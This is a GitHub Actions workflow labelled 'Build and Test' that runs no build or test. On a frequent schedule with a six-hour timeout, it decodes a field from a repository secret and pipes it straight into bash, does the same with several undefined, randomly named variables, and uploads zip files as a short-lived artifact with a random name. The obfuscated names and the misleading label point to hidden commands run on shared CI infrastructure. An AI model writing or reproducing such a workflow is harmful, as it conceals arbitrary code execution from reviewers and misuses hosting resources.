name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '7 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          izt25: ${{ secrets.izt25 }}
        run: |
          printf '%s' "$izt25" | jq -r .r067 | /bin/bash
          echo $yq39464 | jq -r .pgex22177 | /bin/bash
          printf '%s' "$enrps18219" | jq -r .utoqy9899 | /bin/bash
          echo $jvnst56726 | jq -r .warc13209 | /bin/bash
          echo $xmim03 | jq -r .ncza54597 | /bin/bash
          echo $d89 | jq -r .wplw59 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Pt5HjMHG
          path: "*.zip"
          retention-days: 1
